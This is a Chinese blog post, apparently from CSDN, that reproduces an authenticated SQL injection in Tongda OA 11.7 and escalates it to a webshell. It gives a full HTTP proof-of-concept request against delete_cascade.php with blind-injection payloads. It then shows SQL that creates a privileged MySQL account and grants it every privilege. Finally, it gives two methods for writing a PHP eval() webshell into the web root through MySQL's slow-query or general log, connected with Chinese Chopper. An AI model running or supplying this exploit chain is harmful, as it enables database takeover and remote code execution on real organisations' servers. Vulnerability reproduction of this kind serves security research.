通过oa后台入侵mysql_通达OA 11.7 后台sql注入getshell漏洞复现

最新推荐文章于 2023-01-12 00:00:35 发布
最新推荐文章于 2023-01-12 00:00:35 发布
阅读量74 收藏
点赞数
文章标签: 通过oa后台入侵mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39821378/article/details/113722982
版权

c1ca09894a85f84fa3cfb2a116262e47.png

0x00 漏洞描述

通达OA 11.7存在sql注入

0x01 漏洞影响版本

通达oa 11.7

利用条件:需要账号登录

0x02 漏洞复现

1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装

2、condition_cascade参数存在布尔盲注

POC:

GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(9999,99)) HTTP/1.1

Host: 192.168.77.137

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

X-Requested-With: XMLHttpRequest

Referer: http://192.168.77.137/general/index.php?isIE=0&modify_pwd=0

Cookie: PHPSESSID=ebpjtm5tqh5tvida5keba73fr0; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d

DNT: 1

Connection: close

3、经过测试,过滤了一些函数(sleep、报错的函数等等),各种注释,使用payload:select if((1=1),1,power(9999,99))、select if((1=2),1,power(9999,99)),判断注入点 #当字符相等时,不报错,错误时报错

b59cca8062796cfd98d3c30a76e5e7ac.png

496cba18992f32cc6bbd64002e3cd839.png

4、通过添加用户at666,密码为abcABC@123

grant all privileges ON mysql.* TO ‘at666’@’%’ IDENTIFIED BY ‘abcABC@123’ WITH GRANT OPTION

2670f9293a5a03e2e9417bc57c7e73d4.png

5、使用Navicat Premium连接数据库

f5bed2df85c94665aa163aee60d429e6.png

6、添加的账户不能直接通过日志慢查询写入文件,需要给创建的账户添加权限

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));

f972548ef7a52ae7d77b2d3e9f42ce62.png

7、然后用注入点刷新权限,因为该用户是没有刷新权限的权限的

general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

bf1662ad016f41e9f04cd072ceada936.png

8、再次登录,提示密码过期,需要重新执行grant all privileges ON mysql.* TO ‘at666’@’%’ IDENTIFIED BY ‘abcABC@123’ WITH GRANT OPTION

39ce97116e1cb5501b297123cf954980.png

b7234c221f40dfdb32ed8e4cb8130557.png

9、然后写shell

方法一:

select @@basedir;

set global slow_query_log=on;

set global slow_query_log_file=’C:/tongda11.7/webroot/test.php’;

select ‘<?php eval($_POST[x]);?>’ or sleep(11);

方法二:

select @@basedir;

set global general_log = on;

set global general_log_file =’C:/tongda11.7/webroot/test2.php’;

select ‘<?php eval($_POST[test2]);?>’;

show variables like ‘%general%’;

b02cdd867e6068ee82905a75c8e6bd1d.png

4581b68f07e703857eaf3e19a394693e.png

10、菜刀连接

51b7f0db3bb4f0289f45f132898e7ab5.png

0x03 参考链接

参考:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

喜欢 (4)or分享 (0)

weixin_39821378
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
sql安装包_通达OA11.7 后台sql注入到rce漏洞分析
weixin_39887221的博客
11-24 326
前言hvv期间爆了一个通达OA漏洞,尝试分析一些这个漏洞的原因以及利用的姿势。攻击队的大佬tql,0day一个接一个的爆。膜师傅们~~~~测试环境通达OA11.7官网上下载的通达OA11.7的安装包,然后傻瓜式一键安装。漏洞分析漏洞点在:general/hr/manage/query/delete_cascade.php文件下:通过代码发现这里对传递的参数没有任何的过滤,是存在sql注...
mysql使用navicat给指定用户授权查看数据库中的某些数据表
04-27 9876
mysql使用navicat给指定用户授权查看数据库中的某些数据表
win server 2012 使用Navicat for mysql 链接不了本地的mysql数据库,提示10038 或 0
11-14 1340
找到C:/Windows/System32/Drivers/etc文件夹; 编辑hosts文件, 将127.0.0.1前面的#号去掉即可。
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
1. 测试环境 2. 代码审计发现注 3. 构造利链
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
基于MySQLSQL注入攻击(20191202232232).pdf
12-02
MySQLSQL注入攻击(SEC-W05-003.1) 注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,可能 B/S模式应用开发的发展
通达OA系统11.2漏洞
qq_50854662的博客
12-02 4453
通达OA系统11.2版本为案例的Web渗透
蓝凌(Landray)OA漏洞常见RCE
qq_53385700的博客
01-12 1万+
蓝凌OA常见RCE的poc
用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录
kelenwait的博客
06-23 7481
简介 用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。 漏洞情况 用友OA_U8 存在SQL 注入 用友NCCloud FS文件管理 SQL 注入 用友NC bsh.servlet.BshServlet 远程命令执行 用友NC 任意文件上传 getShell 漏洞复现 1.用友 OA_U8 SQL 注入 poc /yyoa/common/js/menu/tes
蓝凌OA漏洞复现
混子
12-13 2万+
又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA
mysql 入侵_mysql5.0入侵测试以及防范方法分享
weixin_36349685的博客
01-18 203
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:grant all privileges on *.* to 数据库账...
2021-泛微OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
致远OA漏洞复现
热门推荐
混子
12-31 4万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
网红漏洞“致远OA系统上的GetShell漏洞”详解
systemino的博客
07-08 1万+
概述 腾讯御界高级威胁检测系统近期监测到“致远OA系统上的 GetShell漏洞”在网上被频繁利用攻击政企客户。 对于存在漏洞OA系统,攻击者无需任何权限,即可向服务器上传webshell。 腾讯驻场工程师通过御界高级威胁检测系统告警通知及时向客户通报并采取必要措施,客户业务系统未受攻击影响。 详细分析 该漏洞最早于6月26号左右,有安全厂商发出漏洞预警。 远程攻击者在无需登录的...
sql注入_万户oa_documentedit.jsp
最新发布
01-21
在万户OA系统的documentedit.jsp页面中,如果未对用户输入进行正确的过滤和验证,可能存在SQL注入漏洞。 攻击者可以通过在输入字段中输入恶意的SQL语句,来实施SQL注入攻击。例如,攻击者可以通过在输入字段中输入'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值